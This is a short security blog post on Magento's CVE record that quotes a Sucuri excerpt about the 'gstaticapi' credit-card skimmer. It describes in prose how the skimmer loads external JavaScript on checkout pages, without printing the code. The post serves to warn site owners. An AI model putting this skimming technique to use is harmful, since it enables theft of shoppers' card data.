Another Magento Credit Card Stealing Malware: gstaticapi

Magento is an Open source PHP code based e-commerce CMS (Content Management System).

As of this writing Magento has 194 listed CVE’s (Common Vulnerabilities and Exposures).

This is very few compared to WordPress’s 2,641 currently listed CVE’s.

What does a low number of CVE’s mean?

It means for the most part Magento is pretty secure (mostly due to the much lower number of Plugins and Themes available with CMS’s like WordPress or Joomla).

With that said, being intended for e-commerce puts it as a prime target when vulnerabilities are found and made public.

The most common hack we see on Magento sites is Credit Card theft.

Having credit card theft happening on your website is not something you want to happen.

It’s of the utmost importance to keep your Magento up to date and be aware of any security vulnerabilities that may exist and get them fixed immediately.

Sucuri recently found another credit card swiper in the wild.

Article Excerpt: Our team recently came across a malicious script used on a Magento website titled gstaticapi, which targeted checkout processes to capture and exfiltrate stolen information.

To obtain sensitive details, the malware loads external javascript whenever the URL contains “checkout” ⁠— this location typically belongs to the step in Magento’s checkout process where users enter their sensitive credit card information and shipping details.

As seen above, the first if statement looks for the checkout string in the URL using window.location.href.indexOf.

Continue reading Magento Credit Card Stealing Malware: gstaticapi at Sucuri Blog.

Leave a Reply